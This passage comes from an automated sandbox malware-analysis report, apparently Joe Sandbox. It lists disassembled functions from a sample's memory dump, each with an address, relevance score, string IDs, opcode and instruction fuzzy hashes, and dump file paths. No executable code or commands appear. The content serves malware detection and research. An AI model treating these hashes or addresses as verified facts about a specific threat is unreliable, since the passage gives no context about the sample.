                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: %*+($f
                                                                                                                                                            • API String ID: 0-2038831151
                                                                                                                                                            • Opcode ID: e817777ab5a716ef9e1f4a7ecd987152ee1eaea9685a0b389eb82c74943374f4
                                                                                                                                                            • Instruction ID: c898861bb73bab251c9e76434a7d9bdda7fe9505b28fb7753eb08d842edfa285
                                                                                                                                                            • Opcode Fuzzy Hash: e817777ab5a716ef9e1f4a7ecd987152ee1eaea9685a0b389eb82c74943374f4
                                                                                                                                                            • Instruction Fuzzy Hash: BA129B756083419FC714CF18C880B2AFBE2FB89314F188AAEF5959B391E771D945CB92
                                                                                                                                                            Function 00BCF620 Relevance: 3.0, Strings: 2, Instructions: 461COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: dg$hi
                                                                                                                                                            • API String ID: 0-2859417413
                                                                                                                                                            • Opcode ID: fc35b229558fadfdd5d83e3b4c0af97ac72f440ce06640fd43372616bf6bbf6e
                                                                                                                                                            • Instruction ID: 6108907866bcb99118a998240281ddd4ff7fda28a0e649754cee999f1b5ecbe4
                                                                                                                                                            • Opcode Fuzzy Hash: fc35b229558fadfdd5d83e3b4c0af97ac72f440ce06640fd43372616bf6bbf6e
                                                                                                                                                            • Instruction Fuzzy Hash: 55F19371618342EFE704CF24D891B2ABBF6FB86345F1499ACF0958B2A1CB34D945CB52
                                                                                                                                                            Function 00B935B0 Relevance: 2.9, Strings: 2, Instructions: 411COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: Inf$NaN
                                                                                                                                                            • API String ID: 0-3500518849
                                                                                                                                                            • Opcode ID: fac3d30ef34f870e16ffedc5c03a155bf363ac37bb41ac79daf1815b14a76a76
                                                                                                                                                            • Instruction ID: d9ed0cac6423e2b1f01b9609ed1512baafd864e348dc066351019f87712dfb6c
                                                                                                                                                            • Opcode Fuzzy Hash: fac3d30ef34f870e16ffedc5c03a155bf363ac37bb41ac79daf1815b14a76a76
                                                                                                                                                            • Instruction Fuzzy Hash: CCD1E671A183119BCB04CF29C8C061EFBE1EBC8B50F158A7DF999973A0E675DD058B82
                                                                                                                                                            Function 00D56366 Relevance: 2.8, Strings: 1, Instructions: 1579COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 5FJ_
                                                                                                                                                            • API String ID: 0-1675939095
                                                                                                                                                            • Opcode ID: 0e3fec6fc76b6a909579bc91e97cd4014399d49c82f57401d8eecb16b07287e1
                                                                                                                                                            • Instruction ID: 874ef6ff11716f5f55522bfc5821c5665cc7fc8be763e8bf92c22f1f67c454d0
                                                                                                                                                            • Opcode Fuzzy Hash: 0e3fec6fc76b6a909579bc91e97cd4014399d49c82f57401d8eecb16b07287e1
                                                                                                                                                            • Instruction Fuzzy Hash: ABB2F4F3A08200AFE3046E2DEC4567AFBE9EF94720F1A893DE6C487744E63558458797
                                                                                                                                                            Function 00BAFFDF Relevance: 2.7, Strings: 2, Instructions: 185COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: BaBc$Ye[g
                                                                                                                                                            • API String ID: 0-286865133
                                                                                                                                                            • Opcode ID: 20a00836de8f27b93084267ce082bf7f3661bb29362c2b1820b8ec99fcb00f63
                                                                                                                                                            • Instruction ID: d35a4fa103badf2126c99c936d34f8a87a98d349b835c5de33242a3a9f46508a
                                                                                                                                                            • Opcode Fuzzy Hash: 20a00836de8f27b93084267ce082bf7f3661bb29362c2b1820b8ec99fcb00f63
                                                                                                                                                            • Instruction Fuzzy Hash: D651CCB16183858BC731EF18C881BBBB7E0FF96310F08495DE49A9B651E3B49940CB57
                                                                                                                                                            Function 00B95160 Relevance: 1.8, Strings: 1, Instructions: 577COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: %1.17g
                                                                                                                                                            • API String ID: 0-1551345525
                                                                                                                                                            • Opcode ID: 68eb9a0506cef4954dac51bbcd63575a669911dcda81232007bcc746a268b8d2
                                                                                                                                                            • Instruction ID: 79cf089e69deef8bfbd757061e7dafb37f63d8d0f95b184294476287f4d0b016
                                                                                                                                                            • Opcode Fuzzy Hash: 68eb9a0506cef4954dac51bbcd63575a669911dcda81232007bcc746a268b8d2
                                                                                                                                                            • Instruction Fuzzy Hash: 3122D2B2A48B428BEF368E58D880326BBE2EFE0304F1985BDD8994B351E775DD45C741
                                                                                                                                                            Function 00BC12D0 Relevance: 1.7, Strings: 1, Instructions: 484COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: "
                                                                                                                                                            • API String ID: 0-123907689
                                                                                                                                                            • Opcode ID: 1e36e4a90a5bcd9904d9a2755a98640d2f51fe7f53356f7c076c40d918f289ea
                                                                                                                                                            • Instruction ID: 5711ac524edc17d3f05575b5233780fe408f597f40d411a1644844be48c26d9e
                                                                                                                                                            • Opcode Fuzzy Hash: 1e36e4a90a5bcd9904d9a2755a98640d2f51fe7f53356f7c076c40d918f289ea
                                                                                                                                                            • Instruction Fuzzy Hash: D7F1F571A083415BC724CE28C491F6BBBE5EFC6354F188DADE89AA7383D634DD058792
                                                                                                                                                            Function 00BBAE57 Relevance: 1.7, Strings: 1, Instructions: 455COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: %*+(
                                                                                                                                                            • API String ID: 0-3233224373
                                                                                                                                                            • Opcode ID: da555a5b813143ffed9717bc8372c13218b4028e913995b9a6ede9f724b5b495
                                                                                                                                                            • Instruction ID: a75e29149558cb61356c4180e9e5969d6c2ad593857f676e3d0ca94a776c461f
                                                                                                                                                            • Opcode Fuzzy Hash: da555a5b813143ffed9717bc8372c13218b4028e913995b9a6ede9f724b5b495
                                                                                                                                                            • Instruction Fuzzy Hash: D1E19A71508346CBC324DF28C4909BEB7E2FF98781F64895CE4C587221E7B1E999CB92
                                                                                                                                                            Function 00BA6EBF Relevance: 1.7, Strings: 1, Instructions: 447COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: %*+(
                                                                                                                                                            • API String ID: 0-3233224373
                                                                                                                                                            • Opcode ID: d38cafeda1f412bfc29a7cc95f3d8bc30397e7e619c2417d2d8b7e76891a6949
                                                                                                                                                            • Instruction ID: 0291738b865b7792c38e8fb5d12eb98e7d3bb6c4919dde005af1027c45014f7f
                                                                                                                                                            • Opcode Fuzzy Hash: d38cafeda1f412bfc29a7cc95f3d8bc30397e7e619c2417d2d8b7e76891a6949
                                                                                                                                                            • Instruction Fuzzy Hash: FCF1ADB5A04A01CFC724DF24D891A26B7F2FF49314B188ABDE49787A91EB31F815CB45
                                                                                                                                                            Function 00BB7E60 Relevance: 1.7, Strings: 1, Instructions: 425COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: %*+(
                                                                                                                                                            • API String ID: 0-3233224373
                                                                                                                                                            • Opcode ID: ed7bdcb999b7a05afa63129abb0fc9486ce7982c1207fc5f282197a8542aac92
                                                                                                                                                            • Instruction ID: 1e19026452b811d8b7a0318975267215d4f752e57bdfa54f5601a3679887c272
                                                                                                                                                            • Opcode Fuzzy Hash: ed7bdcb999b7a05afa63129abb0fc9486ce7982c1207fc5f282197a8542aac92
                                                                                                                                                            • Instruction Fuzzy Hash: ADC1DF71509200ABD710EF18D882A7BB7F9EF95754F48889CF8C59B251E7B4EC11CBA2
                                                                                                                                                            Function 00BB8D62 Relevance: 1.7, Strings: 1, Instructions: 410COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: %*+(
                                                                                                                                                            • API String ID: 0-3233224373
                                                                                                                                                            • Opcode ID: f44e71146079a395ec3e9a39ba7f9c3ed144cd48b429689d4a2c0cfa8e1e6f8b
                                                                                                                                                            • Instruction ID: 6c45535e2bb2394bc995e5b76bbfd363b1bb70d978097cd637c9c8c720287c8a
                                                                                                                                                            • Opcode Fuzzy Hash: f44e71146079a395ec3e9a39ba7f9c3ed144cd48b429689d4a2c0cfa8e1e6f8b
                                                                                                                                                            • Instruction Fuzzy Hash: 10D1D070628342DFD704EF68DC90A6AB7E5FF89305F4988BCE9868B251DB74E850CB51
                                                                                                                                                            Function 00BD7FC0 Relevance: 1.6, Strings: 1, Instructions: 387COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: P
                                                                                                                                                            • API String ID: 0-3110715001
                                                                                                                                                            • Opcode ID: 2eefbf977feb1e87c54c33996dad57d1f240410fa3d5e8ee41a53c826957b417
                                                                                                                                                            • Instruction ID: 877c9da5c7ee67e46f1258daa705f4e7f89bc27f81173c15ff9849bf3c541467
                                                                                                                                                            • Opcode Fuzzy Hash: 2eefbf977feb1e87c54c33996dad57d1f240410fa3d5e8ee41a53c826957b417
                                                                                                                                                            • Instruction Fuzzy Hash: 61D1D4729082658FC725CE18E89071EF7E1EB85718F19866DE8A5AF380EB71DC46C7C1
                                                                                                                                                            Function 00BBCCD0 Relevance: 1.6, Strings: 1, Instructions: 357COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.2148035198.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.2148021967.0000000000B90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000BF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000D71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E87000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148069464.0000000000E96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148328253.0000000000E97000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148433996.0000000001034000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.2148448380.0000000001035000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_b90000_file.jbxd
                                                                                                                                                            Similarity
